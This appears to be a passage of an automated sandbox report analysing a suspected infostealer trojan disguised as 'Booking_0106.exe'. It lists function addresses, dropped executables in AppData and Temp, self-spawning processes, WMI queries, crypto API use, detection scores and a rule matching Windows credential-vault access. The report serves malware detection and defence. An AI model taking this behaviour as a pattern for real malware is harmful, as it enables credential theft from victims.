Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD6668	2_2_06BD6668
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD5640	2_2_06BD5640
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD7DF0	2_2_06BD7DF0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BDB2A2	2_2_06BDB2A2
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BDC200	2_2_06BDC200
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD3100	2_2_06BD3100
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD7710	2_2_06BD7710
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BDE418	2_2_06BDE418
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD240A	2_2_06BD240A
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD5D5F	2_2_06BD5D5F
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD0040	2_2_06BD0040
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BD0006	2_2_06BD0006
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A0A2A3	3_2_02A0A2A3
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A0B69C	3_2_02A0B69C
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A017A8	3_2_02A017A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A035B8	3_2_02A035B8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A00BB0	3_2_02A00BB0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A00E88	3_2_02A00E88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A07C08	3_2_02A07C08
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A042FC	3_2_02A042FC
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A020F1	3_2_02A020F1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A021A1	3_2_02A021A1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A04420	3_2_02A04420
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A02428	3_2_02A02428
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A035AB	3_2_02A035AB
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A018A6	3_2_02A018A6
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A0E858	3_2_02A0E858
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A00EC2	3_2_02A00EC2
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A00E78	3_2_02A00E78
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A00F39	3_2_02A00F39
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05677098	3_2_05677098
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05676308	3_2_05676308
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0567BD65	3_2_0567BD65
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05675780	3_2_05675780
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05675790	3_2_05675790
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05677602	3_2_05677602
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05670040	3_2_05670040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05670006	3_2_05670006
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05677380	3_2_05677380
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_056762F8	3_2_056762F8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05702139	3_2_05702139
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05702467	3_2_05702467
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05703748	3_2_05703748
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0571F140	3_2_0571F140
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05710040	3_2_05710040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05710007	3_2_05710007
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574AD58	3_2_0574AD58
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574C5A8	3_2_0574C5A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574B618	3_2_0574B618
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05742EE9	3_2_05742EE9
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574B57A	3_2_0574B57A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574AD48	3_2_0574AD48
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05743D27	3_2_05743D27
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574B773	3_2_0574B773
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574B609	3_2_0574B609
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0574C325	3_2_0574C325
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05743B84	3_2_05743B84
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05743A7F	3_2_05743A7F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05743A88	3_2_05743A88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05757F78	3_2_05757F78
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575C748	3_2_0575C748
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575D3D8	3_2_0575D3D8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057573B0	3_2_057573B0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575F2A8	3_2_0575F2A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05757F69	3_2_05757F69
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575C73B	3_2_0575C73B
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575D66E	3_2_0575D66E
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05759978	3_2_05759978
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057523F8	3_2_057523F8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575D3C8	3_2_0575D3C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057573A0	3_2_057573A0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575F298	3_2_0575F298
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0599D1A0	3_2_0599D1A0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0599F038	3_2_0599F038
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00ECE280	4_2_00ECE280
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00ECA200	4_2_00ECA200
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00EC4A98	4_2_00EC4A98
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00ECAA18	4_2_00ECAA18
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00EC3E80	4_2_00EC3E80
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00EC41C8	4_2_00EC41C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00ECB16F	4_2_00ECB16F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CA494	4_2_064CA494
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CA178	4_2_064CA178
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CBC58	4_2_064CBC58
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CD810	4_2_064CD810
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D5640	4_2_064D5640
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D6668	4_2_064D6668
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D2418	4_2_064D2418
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064DC200	4_2_064DC200
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064DB2B0	4_2_064DB2B0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D7DF0	4_2_064D7DF0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D7710	4_2_064D7710
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064DE418	4_2_064DE418
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D0040	4_2_064D0040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D5D70	4_2_064D5D70
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064D0006	4_2_064D0006
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F9A2A2	8_2_00F9A2A2
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F935B8	8_2_00F935B8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F9B69C	8_2_00F9B69C
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F917A8	8_2_00F917A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F90BB0	8_2_00F90BB0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F97C08	8_2_00F97C08
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F90E88	8_2_00F90E88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F920F1	8_2_00F920F1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F921A1	8_2_00F921A1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F92428	8_2_00F92428
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F94420	8_2_00F94420
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F935AA	8_2_00F935AA
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F918A6	8_2_00F918A6
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F9E858	8_2_00F9E858
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F90EC2	8_2_00F90EC2
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F90E78	8_2_00F90E78
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F90F39	8_2_00F90F39
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05197098	8_2_05197098
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05196308	8_2_05196308
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0519BD65	8_2_0519BD65
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05195790	8_2_05195790
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05195780	8_2_05195780
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05197603	8_2_05197603
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05190007	8_2_05190007
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05190040	8_2_05190040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05197380	8_2_05197380
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_051962F8	8_2_051962F8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05322134	8_2_05322134
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05322467	8_2_05322467
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05323748	8_2_05323748
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0533F140	8_2_0533F140
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05330006	8_2_05330006
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05330040	8_2_05330040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536AD58	8_2_0536AD58
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536C5A8	8_2_0536C5A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536B618	8_2_0536B618
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05362EE9	8_2_05362EE9
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05363D27	8_2_05363D27
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536AD48	8_2_0536AD48
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536B773	8_2_0536B773
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536B609	8_2_0536B609
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536006A	8_2_0536006A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0536C325	8_2_0536C325
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05363B84	8_2_05363B84
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05363A7F	8_2_05363A7F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05363A88	8_2_05363A88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05377F78	8_2_05377F78
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537C748	8_2_0537C748
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053773B0	8_2_053773B0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537D3D8	8_2_0537D3D8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537F2A8	8_2_0537F2A8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053732E0	8_2_053732E0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537DC50	8_2_0537DC50
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537C73A	8_2_0537C73A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05377F69	8_2_05377F69
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537E611	8_2_0537E611
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537D66E	8_2_0537D66E
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05379973	8_2_05379973
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05379978	8_2_05379978
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_05376898	8_2_05376898
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053773A0	8_2_053773A0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053723F8	8_2_053723F8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537D3C8	8_2_0537D3C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537F298	8_2_0537F298
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_055BD1A0	8_2_055BD1A0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_055BF038	8_2_055BF038
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_02E7E270	9_2_02E7E270
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_02E74A98	9_2_02E74A98
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_02E73E80	9_2_02E73E80
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_02E741C8	9_2_02E741C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9A178	9_2_06B9A178
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA6668	9_2_06BA6668
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA5640	9_2_06BA5640
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BAB2AA	9_2_06BAB2AA
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BAC200	9_2_06BAC200
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA3100	9_2_06BA3100
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA7DF0	9_2_06BA7DF0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA7710	9_2_06BA7710
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BAE418	9_2_06BAE418
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA2409	9_2_06BA2409
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA0040	9_2_06BA0040
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA5D5F	9_2_06BA5D5F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06BA0007	9_2_06BA0007

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1736

Source: Booking_0106.exe

Static PE information: invalid certificate

Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000000.1699060117.0000000000CBA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedoc15.exeF vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1730902985.00000000056A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDbjuzsdof.dll" vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1732460118.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Booking_0106.exe
Source: Booking_0106.exe, 00000000.00000002.1710777117.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Booking_0106.exe
Source: Booking_0106.exe, 00000002.00000002.2957702977.00000000010F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Booking_0106.exe
Source: Booking_0106.exe, 00000002.00000002.2956502833.000000000043C000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Booking_0106.exe
Source: Booking_0106.exe	Binary or memory string: OriginalFilenamedoc15.exeF vs Booking_0106.exe

Source: Booking_0106.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.Booking_0106.exe.4023d90.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: Booking_0106.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ibrzb.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/8@1/3

Source: C:\Users\user\Desktop\Booking_0106.exe

File created: C:\Users\user\AppData\Roaming\ibrzb.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588

Source: C:\Users\user\Desktop\Booking_0106.exe

File created: C:\Users\user\AppData\Local\Temp\doc-d.exe

Jump to behavior

Source: Booking_0106.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Booking_0106.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Booking_0106.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Booking_0106.exe	ReversingLabs: Detection: 60%
Source: Booking_0106.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\Booking_0106.exe

File read: C:\Users\user\Desktop\Booking_0106.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Booking_0106.exe "C:\Users\user\Desktop\Booking_0106.exe"
Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\AppData\Local\Temp\doc-d.exe "C:\Users\user\AppData\Local\Temp\doc-d.exe"
Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\Desktop\Booking_0106.exe "C:\Users\user\Desktop\Booking_0106.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1736
Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\AppData\Local\Temp\doc-d.exe "C:\Users\user\AppData\Local\Temp\doc-d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process created: C:\Users\user\Desktop\Booking_0106.exe "C:\Users\user\Desktop\Booking_0106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process created: C:\Users\user\AppData\Roaming\ibrzb.exe "C:\Users\user\AppData\Roaming\ibrzb.exe"

Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Section loaded: uxtheme.dll	Jump to behavior
